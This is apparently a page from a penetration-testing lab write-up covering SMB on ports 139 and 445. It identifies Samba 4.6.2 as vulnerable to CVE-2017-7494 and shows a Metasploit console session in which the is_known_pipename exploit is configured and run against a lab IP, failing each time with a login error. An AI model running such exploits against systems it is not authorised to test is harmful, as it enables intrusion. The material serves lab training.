SMB - 139 & 445

139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2

Found that this version is vulnerable to SambaCry. Having CVE as CVE-2017–7494.

vulhub/samba/CVE-2017-7494/README.md at master · vulhub/vulhubGitHub

The above one is an authenticated attack. Luckily, we have a NULL session in SMB shares.

Exploit-1

Let's try following:

GitHub - opsxcq/exploit-CVE-2017-7494: SambaCry exploit and vulnerable container (CVE-2017-7494)GitHub

I will be using a virtual environment for setting up the required thing.

temp_env

cd exploit-CVE-2017-7494

Install dependency now.

pip install -r requirements.txt

This required python2 and other dependency which was giving error when i tried to install it. So, I tried MetaSploit exploit.

Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)Exploit Database

┌──(kali㉿kali)-[~/pg/hetemit]
└─$ msfconsole -q
msf6 > search CVE 2017 7494

^C[-] search: Interrupted
msf6 > search CVE-2017-7494


Matching Modules
================

   #   Name                                   Disclosure Date  Rank       Check  Description
   -   ----                                   ---------------  ----       -----  -----------
   0   exploit/linux/samba/is_known_pipename  2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   1     \_ target: Automatic (Interact)      .                .          .      .
   2     \_ target: Automatic (Command)       .                .          .      .
   3     \_ target: Linux x86                 .                .          .      .
   4     \_ target: Linux x86_64              .                .          .      .
   5     \_ target: Linux ARM (LE)            .                .          .      .
   6     \_ target: Linux ARM64               .                .          .      .
   7     \_ target: Linux MIPS                .                .          .      .
   8     \_ target: Linux MIPSLE              .                .          .      .
   9     \_ target: Linux MIPS64              .                .          .      .
   10    \_ target: Linux MIPS64LE            .                .          .      .
   11    \_ target: Linux PPC                 .                .          .      .
   12    \_ target: Linux PPC64               .                .          .      .
   13    \_ target: Linux PPC64 (LE)          .                .          .      .
   14    \_ target: Linux SPARC               .                .          .      .
   15    \_ target: Linux SPARC64             .                .          .      .
   16    \_ target: Linux s390x               .                .          .      .


Interact with a module by name or index. For example info 16, use 16 or use exploit/linux/samba/is_known_pipename
After interacting with a module you can manually set a TARGET with set TARGET 'Linux s390x'

msf6 >
msf6 > use exploit/linux/samba/is_known_pipename
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(linux/samba/is_known_pipename) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 exploit(linux/samba/is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CHOST                            no        The local client address
   CPORT                            no        The local client port
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                              -metasploit.html
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)



View the full module info with the info, or info -d command.

msf6 exploit(linux/samba/is_known_pipename) > set RHOST 192.168.180.117
RHOST => 192.168.180.117
msf6 exploit(linux/samba/is_known_pipename) > set RPORT 139
RPORT => 139
msf6 exploit(linux/samba/is_known_pipename) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(linux/samba/is_known_pipename) > exploit

[-] 192.168.180.117:139 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.
msf6 exploit(linux/samba/is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CHOST                            no        The local client address
   CPORT                            no        The local client port
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.180.117  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                              -metasploit.html
   RPORT           139              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)



View the full module info with the info, or info -d command.

msf6 exploit(linux/samba/is_known_pipename) > RPORT 445
[-] Unknown command: RPORT. Run the help command for more details.
msf6 exploit(linux/samba/is_known_pipename) > set RPORT 445
RPORT => 445
msf6 exploit(linux/samba/is_known_pipename) > exploit

[-] 192.168.180.117:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.
msf6 exploit(linux/samba/is_known_pipename) >

Exploit run but no session was created for this.

Previousftp Nextport 18000

Last updated 1 year ago

Was this helpful?

hashtagExploit-1

Exploit-1